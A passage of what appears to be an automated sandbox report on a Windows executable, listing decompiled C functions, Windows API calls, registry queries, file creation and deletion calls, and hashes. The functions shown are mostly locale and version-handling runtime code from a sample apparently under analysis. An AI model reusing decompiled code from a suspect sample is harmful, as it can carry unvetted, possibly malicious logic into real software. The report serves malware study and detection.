                                                				if(_t5 <= 0) {
                                                					return E00406CAC(_t10, _t18);
                                                				}
                                                				return E00406B30(_t10, _t5 - 1,  &_v516, _t19);
                                                			}

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041624A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EnumSystemLocalesW.KERNEL32(00419524,00000002), ref: 007899F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2099609381-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E0041977C(void* __edx) {
                                                				intOrPtr _t2;
                                                				intOrPtr _t7;
                                                				void* _t11;
                                                				intOrPtr _t13;
                                                				void* _t14;
                                                				void* _t15;
                                                
                                                				_t11 = __edx;
                                                				if(__edx != 0) {
                                                					_t15 = _t15 + 0xfffffff0;
                                                					_t2 = E004054AC(_t2, _t14);
                                                				}
                                                				_t13 = _t2;
                                                				E00404E74(0);
                                                				 *((intOrPtr*)(E0040B254() + 0x10)) = _t13;
                                                				EnumSystemLocalesW(E00419524, 2);
                                                				_t7 = _t13;
                                                				if(_t11 != 0) {
                                                					E00405504(_t7);
                                                					_pop( *[fs:0x0]);
                                                				}
                                                				return _t13;
                                                			}









                                                APIs
                                                • EnumSystemLocalesW.KERNEL32(00419524,00000002,?,?,00419AFD,004166F5,?,00000000,00416736,?,?,?,00000000,00000000), ref: 004197A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2099609381-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,007865CA,?,00000001,00000000,00416589), ref: 007864DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E00416278(int __eax, signed int __ecx, int __edx) {
                                                				short _v16;
                                                				signed int _t5;
                                                				signed int _t10;
                                                
                                                				_push(__ecx);
                                                				_t10 = __ecx;
                                                				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
                                                					_t5 = _t10;
                                                				} else {
                                                					_t5 = _v16 & 0x0000ffff;
                                                				}
                                                				return _t5;
                                                			}






                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041637A,?,00000001,00000000,00416589), ref: 0041628B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E004161DC(long long __fp0) {
                                                				long long _v8;
                                                				struct _SYSTEMTIME _v24;
                                                				void* _t16;
                                                				long long* _t21;
                                                				void* _t22;
                                                				long long _t23;
                                                
                                                				_t23 = __fp0;
                                                				GetLocalTime( &_v24);
                                                				E004161AC(_v24.wYear & 0x0000ffff, _v24.wDay & 0x0000ffff, _v24.wMonth & 0x0000ffff, _t22, __fp0);
                                                				_v8 = _t23;
                                                				asm("wait");
                                                				_t16 = E00416064(_v24.wHour & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMinute & 0x0000ffff, _t22, _t23, _v24.wMilliseconds & 0x0000ffff);
                                                				 *_t21 = _t23 + _v24.wSecond;
                                                				asm("wait");
                                                				return _t16;
                                                			}









                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID:
                                                • API String ID: 481472006-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419540(int __eax, void* __ecx, int __edx) {
                                                				short _v2052;
                                                				void* _t6;
                                                				void* _t12;
                                                
                                                				_t6 = __ecx;
                                                				_v2052 = 0;
                                                				GetLocaleInfoW(__eax, __edx,  &_v2052, 0x400);
                                                				return E004073C4(_t6, 0x400, _t12);
                                                			}






                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000400,?,004195F6,?,00000000,00419743), ref: 0041955B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040B008() {
                                                				signed int _t1;
                                                				unsigned int _t3;
                                                				signed int _t5;
                                                
                                                				_t1 = GetVersion();
                                                				_t5 = 0x000000ff & _t1;
                                                				_t3 = (_t1 & 0x0000ff00) >> 8;
                                                				if(0xff != 5 || _t3 < 1) {
                                                					if(_t5 <= 5) {
                                                						 *0x500980 = 0x409;
                                                						return _t3;
                                                					} else {
                                                						goto L3;
                                                					}
                                                				} else {
                                                					L3:
                                                					 *0x500980 = 0x7f;
                                                					return _t3;
                                                				}
                                                			}






                                                APIs
                                                • GetVersion.KERNEL32(004FC0C9,00000400,00000000,004FC0D7), ref: 0040B008
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Version
                                                • String ID:
                                                • API String ID: 1889659487-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004088C4() {
                                                				signed int _t2;
                                                				_Unknown_base(*)()* _t8;
                                                
                                                				InitializeCriticalSection(0x502c0c);
                                                				 *0x502c24 = 0x7f;
                                                				_t2 = GetVersion() & 0x000000ff;
                                                				 *0x502c08 = _t2 - 6 >= 0;
                                                				if( *0x502c08 != 0) {
                                                					 *0x502bfc = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
                                                					 *0x502c00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
                                                					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
                                                					 *0x502c04 = _t8;
                                                					return _t8;
                                                				}
                                                				return _t2;
                                                			}





                                                APIs
                                                • InitializeCriticalSection.KERNEL32(00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088C9
                                                • GetVersion.KERNEL32(00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088D7
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088FE
                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408904
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 00408918
                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040891E
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 00408932
                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408938
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                • API String ID: 74573329-1403180336
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E00416CC0(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				char _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _t64;
                                                				signed int _t68;
                                                				intOrPtr _t83;
                                                				intOrPtr* _t91;
                                                				intOrPtr* _t95;
                                                				intOrPtr _t99;
                                                				void* _t105;
                                                				intOrPtr _t106;
                                                				signed int _t107;
                                                				signed int _t110;
                                                				signed int _t111;
                                                				intOrPtr _t118;
                                                				intOrPtr _t128;
                                                				intOrPtr _t129;
                                                				long _t139;
                                                				void* _t144;
                                                				void* _t145;
                                                				intOrPtr* _t147;
                                                				void* _t149;
                                                				void* _t150;
                                                				void* _t152;
                                                				void* _t153;
                                                				intOrPtr _t154;
                                                				void* _t155;
                                                				void* _t157;
                                                				long long _t174;
                                                
                                                				_t174 = __fp0;
                                                				_t157 = __eflags;
                                                				_t152 = _t153;
                                                				_t154 = _t153 + 0xffffffdc;
                                                				_v32 = 0;
                                                				_v8 = __edx;
                                                				_t105 = __eax;
                                                				_push(_t152);
                                                				_push(0x416f65);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t154;
                                                				E00405720();
                                                				E004058A8(E00405B20(0, __edx, _t157), __edx | 0xffffffff, _t157);
                                                				_push(_t152);
                                                				_push(0x416f48);
                                                				_push( *[fs:edx]);
                                                				 *[fs:edx] = _t154;
                                                				 *0x50379c = 0;
                                                				_push(0);
                                                				E00408478();
                                                				_t155 = _t154 + 4;
                                                				E0041622C(_t105, 0x416f80, 0x100b,  &_v32);
                                                				_t139 = E004147DC(0x416f80, 1, _t157);
                                                				if(_t139 + 0xfffffffd - 3 >= 0) {
                                                					__eflags = _t139 - 0xffffffffffffffff;
                                                					if(_t139 - 0xffffffffffffffff < 0) {
                                                						 *0x50379c = 1;
                                                						_push(1);
                                                						E00408478();
                                                						_t155 = _t155 + 4;
                                                						E00406CAC( *0x5037a0, L"B.C.");
                                                						 *((intOrPtr*)( *0x5037a0 + 4)) = 0;
                                                						_t83 =  *0x5037a0;
                                                						 *((intOrPtr*)(_t83 + 8)) = 0xffc00000;
                                                						 *((intOrPtr*)(_t83 + 0xc)) = 0xc1dfffff;
                                                						E004161AC(1, 1, 1, __eflags, __fp0);
                                                						_v40 = E004048D8();
                                                						_v36 = 1;
                                                						asm("fild qword [ebp-0x24]");
                                                						 *((long long*)( *0x5037a0 + 0x10)) = _t174;
                                                						asm("wait");
                                                						EnumCalendarInfoW(E00416B84, GetThreadLocale(), _t139, 4);
                                                						_v16 =  *0x5037a0;
                                                						_t91 = _v16;
                                                						__eflags = _t91;
                                                						if(_t91 != 0) {
                                                							_t95 = _t91 - 4;
                                                							__eflags = _t95;
                                                							_t91 =  *_t95;
                                                						}
                                                						_t147 = _t91 - 1;
                                                						__eflags = _t147;
                                                						if(_t147 > 0) {
                                                							_t110 = 1;
                                                							do {
                                                								 *((intOrPtr*)( *0x5037a0 + 4 + (_t110 + _t110 * 2) * 8)) = 0xffffffff;
                                                								_t110 = _t110 + 1;
                                                								_t147 = _t147 - 1;
                                                								__eflags = _t147;
                                                							} while (_t147 != 0);
                                                						}
                                                						EnumCalendarInfoW(E00416C28, GetThreadLocale(), _t139, 3);
                                                					}
                                                				} else {
                                                					EnumCalendarInfoW(E00416B84, GetThreadLocale(), _t139, 4);
                                                					_v12 =  *0x5037a0;
                                                					_t99 = _v12;
                                                					if(_t99 != 0) {
                                                						_t99 =  *((intOrPtr*)(_t99 - 4));
                                                					}
                                                					_t149 = _t99 - 1;
                                                					if(_t149 >= 0) {
                                                						_t150 = _t149 + 1;
                                                						_t111 = 0;
                                                						do {
                                                							 *((intOrPtr*)( *0x5037a0 + 4 + (_t111 + _t111 * 2) * 8)) = 0xffffffff;
                                                							_t111 = _t111 + 1;
                                                							_t150 = _t150 - 1;
                                                						} while (_t150 != 0);
                                                					}
                                                					EnumCalendarInfoW(E00416C28, GetThreadLocale(), _t139, 3);
                                                				}
                                                				_v20 =  *0x5037a0;
                                                				_t106 = _v20;
                                                				if(_t106 != 0) {
                                                					_t106 =  *((intOrPtr*)(_t106 - 4));
                                                				}
                                                				_push(_t106);
                                                				E00408478();
                                                				_v24 =  *0x5037a0;
                                                				_t64 = _v24;
                                                				if(_t64 != 0) {
                                                					_t64 =  *((intOrPtr*)(_t64 - 4));
                                                				}
                                                				_t144 = _t64 - 1;
                                                				if(_t144 >= 0) {
                                                					_t145 = _t144 + 1;
                                                					_t107 = 0;
                                                					do {
                                                						_t118 =  *0x4137f4; // 0x4137f8
                                                						E00407AC0( *((intOrPtr*)(_v8 + 0xbc)) + (_t107 + _t107 * 2) * 8, _t118,  *0x5037a0 + (_t107 + _t107 * 2) * 8);
                                                						_t107 = _t107 + 1;
                                                						_t145 = _t145 - 1;
                                                					} while (_t145 != 0);
                                                				}
                                                				_t128 =  *0x416ae0; // 0x416ae4
                                                				E0040859C(0x5037a0, _t128);
                                                				_v28 =  *0x5037a0;
                                                				_t68 = _v28;
                                                				if(_t68 != 0) {
                                                					_t68 =  *(_t68 - 4);
                                                				}
                                                				 *0x50379c = _t68;
                                                				_pop(_t129);
                                                				 *[fs:eax] = _t129;
                                                				_push(0x416f4f);
                                                				return E00405A88( *0x5037a4);
                                                 			}

                                                APIs
                                                  • Part of subcall function 004058A8: GetTickCount.KERNEL32 ref: 004058DF
                                                  • Part of subcall function 004058A8: GetTickCount.KERNEL32 ref: 004058F7
                                                  • Part of subcall function 0041622C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041624A
                                                • GetThreadLocale.KERNEL32(00000000,00000004), ref: 00416D58
                                                • EnumCalendarInfoW.KERNEL32(00416B84,00000000,00000000,00000004), ref: 00416D63
                                                • GetThreadLocale.KERNEL32(00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00416D9E
                                                • EnumCalendarInfoW.KERNEL32(00416C28,00000000,00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00416DA9
                                                • GetThreadLocale.KERNEL32(00000000,00000004), ref: 00416E3A
                                                • EnumCalendarInfoW.KERNEL32(00416B84,00000000,00000000,00000004), ref: 00416E45
                                                • GetThreadLocale.KERNEL32(00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00416E82
                                                • EnumCalendarInfoW.KERNEL32(00416C28,00000000,00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00416E8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: InfoLocale$CalendarEnumThread$CountTick
                                                • String ID: 09A$B.C.$jA
                                                • API String ID: 1601775584-2936603287
                                                • Opcode ID: 3ddd55871247ead042fa03ab5a000ea6b2f1b29fd689d7c3102f82412ed522d0
                                                • Instruction ID: d23605a2abee2f08ff48bd89d78aeba7779998b9b416ce6c05e90c4c60aee192
                                                • Opcode Fuzzy Hash: 3ddd55871247ead042fa03ab5a000ea6b2f1b29fd689d7c3102f82412ed522d0
                                                • Instruction Fuzzy Hash: 5A61D9B4A006059FD710EF69DC81A9E77B9FB88314B11857AE904E73A1D738DE41CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004093B1,?,?), ref: 00779415
                                                • RegOpenKeyExW.ADVAPI32(80000001,004093C0,00000000,000F0019,?,00000000,?,00000105,00000000,004093B1,?,?), ref: 0077945E
                                                • RegOpenKeyExW.ADVAPI32(80000002,004093C0,00000000,000F0019,?,80000001,004093C0,00000000,000F0019,?,00000000,004093B1,?,?), ref: 00779480
                                                • RegOpenKeyExW.ADVAPI32(80000001,004093FC,00000000,000F0019,?,80000002,004093C0,00000000,000F0019,?,80000001,004093C0,00000000,000F0019,?,00000000), ref: 0077949E
                                                • RegOpenKeyExW.ADVAPI32(80000002,004093FC,00000000,000F0019,?,80000001,004093FC,00000000,000F0019,?,80000002,004093C0,00000000,000F0019,?,80000001), ref: 007794BC
                                                • RegOpenKeyExW.ADVAPI32(80000001,00409430,00000000,000F0019,?,80000002,004093FC,00000000,000F0019,?,80000001,004093FC,00000000,000F0019,?,80000002), ref: 007794DA
                                                • RegOpenKeyExW.ADVAPI32(80000001,00409464,00000000,000F0019,?,80000001,00409430,00000000,000F0019,?,80000002,004093FC,00000000,000F0019,?,80000001), ref: 007794F8
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,00409464,00000000,000F0019,?,80000001,00409430), ref: 00779538
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001), ref: 00779563
                                                • RegCloseKey.ADVAPI32(?,0040939B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,004093C0), ref: 007795DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Open$QueryValue$CloseFileModuleName
                                                • String ID:
                                                • API String ID: 2701450724-0
                                                • Opcode ID: e783b76fae9d7cbe9ae9cad6cf855b6db60d2a89546f793595698cc69ab423f4
                                                • Instruction ID: 4f13a82c28c392d4ccf5ecabc20863801aa2de39f4e7ffd3daa5bd5cbfe1e7ca
                                                • Opcode Fuzzy Hash: e783b76fae9d7cbe9ae9cad6cf855b6db60d2a89546f793595698cc69ab423f4
                                                • Instruction Fuzzy Hash: D7511375A4021CFEEF61DAA4CC46FAE73BCDF08740F618065BA18F61C2D678AA51CA54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E004162A4(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v8;
                                                				char _v12;
                                                				char _v16;
                                                				char _v20;
                                                				char _v24;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v44;
                                                				char _v48;
                                                				char _v52;
                                                				char _v56;
                                                				char _v60;
                                                				int _t55;
                                                				void* _t121;
                                                				void* _t128;
                                                				void* _t151;
                                                				void* _t152;
                                                				intOrPtr _t172;
                                                				intOrPtr _t204;
                                                				signed short _t212;
                                                				int _t214;
                                                				intOrPtr _t216;
                                                				intOrPtr _t217;
                                                				void* _t224;
                                                
                                                				_t224 = __fp0;
                                                				_t211 = __edi;
                                                				_t216 = _t217;
                                                				_t152 = 7;
                                                				do {
                                                					_push(0);
                                                					_push(0);
                                                					_t152 = _t152 - 1;
                                                				} while (_t152 != 0);
                                                				_push(__edi);
                                                				_t151 = __edx;
                                                				_t214 = __eax;
                                                				_push(_t216);
                                                				_push(0x416589);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t217;
                                                				_t55 = IsValidLocale(__eax, 1);
                                                				_t219 = _t55;
                                                				if(_t55 == 0) {
                                                					_t214 = GetThreadLocale();
                                                				}
                                                				_t172 =  *0x41392c; // 0x413930
                                                				E0040859C(_t151 + 0xbc, _t172);
                                                				E00416CC0(_t214, _t151, _t151, _t211, _t214, _t219, _t224);
                                                				E00416980(_t214, _t151, _t151, _t211, _t214);
                                                				E00416A3C(_t214, _t151, _t151, _t211, _t214);
                                                				E0041622C(_t214, 0, 0x14,  &_v20);
                                                				E00406CAC(_t151, _v20);
                                                				E0041622C(_t214, 0x4165a4, 0x1b,  &_v24);
                                                				 *((char*)(_t151 + 4)) = E004147DC(0x4165a4, 0, _t219);
                                                				E0041622C(_t214, 0x4165a4, 0x1c,  &_v28);
                                                				 *((char*)(_t151 + 0xc6)) = E004147DC(0x4165a4, 0, _t219);
                                                				 *((short*)(_t151 + 0xc0)) = E00416278(_t214, 0x2c, 0xf);
                                                				 *((short*)(_t151 + 0xc2)) = E00416278(_t214, 0x2e, 0xe);
                                                				E0041622C(_t214, 0x4165a4, 0x19,  &_v32);
                                                				 *((char*)(_t151 + 5)) = E004147DC(0x4165a4, 0, _t219);
                                                				_t212 = E00416278(_t214, 0x2f, 0x1d);
                                                				 *(_t151 + 6) = _t212;
                                                				_push(_t212);
                                                				E0041701C(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
                                                				E00406CAC(_t151 + 0xc, _v36);
                                                				_push( *(_t151 + 6) & 0x0000ffff);
                                                				E0041701C(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
                                                				E00406CAC(_t151 + 0x10, _v40);
                                                				 *((short*)(_t151 + 8)) = E00416278(_t214, 0x3a, 0x1e);
                                                				E0041622C(_t214, 0x4165f8, 0x28,  &_v44);
                                                				E00406CAC(_t151 + 0x14, _v44);
                                                				E0041622C(_t214, 0x41660c, 0x29,  &_v48);
                                                				E00406CAC(_t151 + 0x18, _v48);
                                                				E004069A8( &_v12);
                                                				E004069A8( &_v16);
                                                				E0041622C(_t214, 0x4165a4, 0x25,  &_v52);
                                                				_t121 = E004147DC(0x4165a4, 0, _t219);
                                                				_t220 = _t121;
                                                				if(_t121 != 0) {
                                                					E00406CF4( &_v8, 0x416630);
                                                				} else {
                                                					E00406CF4( &_v8, 0x416620);
                                                				}
                                                				E0041622C(_t214, 0x4165a4, 0x23,  &_v56);
                                                				_t128 = E004147DC(0x4165a4, 0, _t220);
                                                				_t221 = _t128;
                                                				if(_t128 == 0) {
                                                					E0041622C(_t214, 0x4165a4, 0x1005,  &_v60);
                                                					if(E004147DC(0x4165a4, 0, _t221) != 0) {
                                                						E00406CF4( &_v12, L"AMPM ");
                                                					} else {
                                                						E00406CF4( &_v16, L" AMPM");
                                                					}
                                                				}
                                                				_push(_v12);
                                                				_push(_v8);
                                                				_push(":mm");
                                                				_push(_v16);
                                                				E00407590(_t151 + 0x1c, _t151, 4, _t212, _t214);
                                                				_push(_v12);
                                                				_push(_v8);
                                                				_push(L":mm:ss");
                                                				_push(_v16);
                                                				E00407590(_t151 + 0x20, _t151, 4, _t212, _t214);
                                                				 *((short*)(_t151 + 0xa)) = E00416278(_t214, 0x2c, 0xc);
                                                				 *((short*)(_t151 + 0xc4)) = 0x32;
                                                				_pop(_t204);
                                                				 *[fs:eax] = _t204;
                                                				_push(0x416590);
                                                				return E00406A08( &_v60, 0xe);
                                                 			}

                                                APIs
                                                • IsValidLocale.KERNEL32(?,00000001,00000000,00416589,?,?,?,?,00000000,00000000), ref: 004162CB
                                                • GetThreadLocale.KERNEL32(?,00000001,00000000,00416589,?,?,?,?,00000000,00000000), ref: 004162D4
                                                  • Part of subcall function 00416278: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041637A,?,00000001,00000000,00416589), ref: 0041628B
                                                  • Part of subcall function 0041622C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041624A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Locale$Info$ThreadValid
                                                • String ID: AMPM$09A$2$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                • API String ID: 233154393-883918716
                                                • Opcode ID: fdb5538a9b06cfa99486f28ba651596c5750f2b5066976838adddfba7b733d54
                                                • Instruction ID: 95a7bddb840ee677bf0daabfca62effc83962940e19971429c5d1e15ccf5a563
                                                • Opcode Fuzzy Hash: fdb5538a9b06cfa99486f28ba651596c5750f2b5066976838adddfba7b733d54
                                                • Instruction Fuzzy Hash: 79713030700108ABDB01FBA5D841BDE77AAEF88304F52807BF505AB68ADB3DD956875D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00775AF8: GetTickCount.KERNEL32 ref: 00775B2F
                                                  • Part of subcall function 00775AF8: GetTickCount.KERNEL32 ref: 00775B47
                                                • GetThreadLocale.KERNEL32(00000000,00000004), ref: 00786FA8
                                                • EnumCalendarInfoW.KERNEL32(00416B84,00000000,00000000,00000004), ref: 00786FB3
                                                • GetThreadLocale.KERNEL32(00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00786FEE
                                                • EnumCalendarInfoW.KERNEL32(00416C28,00000000,00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00786FF9
                                                • GetThreadLocale.KERNEL32(00000000,00000003,00416B84,00000000,00000000,00000004), ref: 007870D2
                                                • EnumCalendarInfoW.KERNEL32(00416C28,00000000,00000000,00000003,00416B84,00000000,00000000,00000004), ref: 007870DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: CalendarEnumInfoLocaleThread$CountTick
                                                • String ID: 09A$B.C.$SVWUj$jA
                                                • API String ID: 559552752-3833838168
                                                • Opcode ID: da3ef4ee8698bd30782b0b30e8045500b90a98b35a04bbc9edd405ff5d527242
                                                • Instruction ID: b494a2a14d2631fa8f896d6bd25d91940e06f1daed03688629782261195ce4be
                                                • Opcode Fuzzy Hash: da3ef4ee8698bd30782b0b30e8045500b90a98b35a04bbc9edd405ff5d527242
                                                • Instruction Fuzzy Hash: 2161D5B0A40605DFDB10EF68DC89A9E77A9FB88750B218535E905D73A2D739DE01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNEL32(00000000,00000000,004F6D12), ref: 00866BA1
                                                • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000001,00000080,00000000,00000000,004F6D12), ref: 00866CDA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: File$CreateDelete
                                                • String ID: DO$GetNamedPipeClientSessionId$LO$LO$NdrProxyForwardingFunction4
                                                • API String ID: 1264090339-1640843040
                                                • Opcode ID: 518c23d147a51c244c441e2e873cdb988a8ce36efcc6c552713f0013b3310d01
                                                • Instruction ID: c9c9a3317588874d5478db62b9bbc047695d90edaa0b4bef073ac28f007504c1
                                                • Opcode Fuzzy Hash: 518c23d147a51c244c441e2e873cdb988a8ce36efcc6c552713f0013b3310d01
                                                • Instruction Fuzzy Hash: 83F1C374E00248DFCB00DFE9E985AADBBF5FB08305F21852AE505EB225E734A955CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetThreadLocale.KERNEL32(?,00000001,00000000,00416589,?,?,?,?,00000000,00000000), ref: 00786524
